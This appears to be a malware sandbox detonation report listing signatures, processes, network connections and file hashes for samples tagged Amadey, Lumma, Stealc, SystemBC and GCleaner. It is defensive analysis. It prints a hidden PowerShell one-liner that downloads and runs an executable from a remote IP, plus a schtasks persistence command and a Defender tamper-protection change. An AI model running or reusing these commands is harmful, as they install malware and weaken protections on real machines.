Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2420 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\cmd.exe (x3)
PID 2420 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\mshta.exe (x3)
PID 1032 wrote to memory of 3008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe (x3)
PID 4768 wrote to memory of 1992 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (x3)
PID 1992 wrote to memory of 1932 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE (x3)

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn sCXK4maXN6R /tr "mshta C:\Users\Admin\AppData\Local\Temp\5WMgEtyym.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\5WMgEtyym.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn sCXK4maXN6R /tr "mshta C:\Users\Admin\AppData\Local\Temp\5WMgEtyym.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE

"C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE"

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 g.bing.com udp
RU 185.215.113.16:80 185.215.113.16 tcp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\5WMgEtyym.hta

MD5 f8e2603fe8abf0fbff0c7219f29fb096
SHA1 f52c4823fe0f88c26709791ad0e1cfc4c72d5aa5
SHA256 6c544774b42083b87161909dd85992ee985fc44e1527ba3d8d038dc22fad1de5
SHA512 bdeb4c6da166443882ba02338caa6deaa05c477bb7323f3be5b7d850de71af6c828ffa2f8d0f23fc695fda68553a5b17be5b724917c5871d7bd3af80f4ce5ec5

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nq4kj3qw.14m.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE

MD5 03a574d64f0e62c5e117a5f5acf137e4
SHA1 93ba2b5bdac91342c9eeaeaf3e44cc1793ee6d90
SHA256 dcc540b3c86a167bb0cf71e8d4598f7566fe0f625d64ffe7a37f0d5f502be747
SHA512 d1b76d82c522ccb157dcd5155011619b36baf3516cf08cb6bc98fb9bc009230e5c53d77f5d8adc0e85dde678b4b3542823919ee6490533df8250078caca1b9b1

Analysis: behavioral8

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win10v2004-20250217-en

Max time kernel

145s

Max time network

146s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\GEFwbK0.html

Signatures

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (x25)

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (x24)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5080 wrote to memory of 2320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (x2)
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (x40)
PID 5080 wrote to memory of 3120 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (x2)
PID 5080 wrote to memory of 4904 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (x20)

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\GEFwbK0.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f86f46f8,0x7ff8f86f4708,0x7ff8f86f4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4064 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 /prefetch:2

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 150.171.28.10:443 tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 fffde59525dd5af902ac449748484b15
SHA1 243968c68b819f03d15b48fc92029bf11e21bedc
SHA256 26bc5e85dd325466a27394e860cac7bef264e287e5a75a20ea54eec96abd0762
SHA512 f246854e8ed0f88ca43f89cf497b90383e05ffa107496b4c346f070f6e9bbf1d9dc1bdcc28cad6b5c7810e3ba39f27d549061b3b413a7c0dd49faacae68cd645

\??\pipe\LOCAL\crashpad_5080_BSPSSOACWQNWCXYB

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 ab283f88362e9716dd5c324319272528
SHA1 84cebc7951a84d497b2c1017095c2c572e3648c4
SHA256 61e4aa4614e645255c6db977ea7da1c7997f9676d8b8c3aaab616710d9186ab2
SHA512 66dff3b6c654c91b05f92b7661985391f29763cf757cc4b869bce5d1047af9fb29bbe37c4097ddcfa021331c16dd7e96321d7c5236729be29f74853818ec1484

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 10bf642ac57e600422a5a3557ee16d98
SHA1 e8151529351b298372afa609d858c2c47c76e3e7
SHA256 db9f95714608f587eccccee430df0a34f8e5c37fdcd211cd1355bacd8a080f3c
SHA512 55d4915202219328869dda4a58dd9f6ce2584c0946611f6278b6932fa4a7877917ea4df68a0dfcb84ef38d76b9863190048e3b84fbdd6df85d225d5f4b4a787b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Analysis: behavioral15

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win10v2004-20250217-en

Max time kernel

147s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\eltqgcf\oamb.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\eltqgcf\oamb.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\eltqgcf\oamb.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035810101\9e28748818.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempNIKU2KFNSI0OSCJ5SNYFIAJYHYQOJDXS.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\ProgramData\eltqgcf\oamb.exe N/A
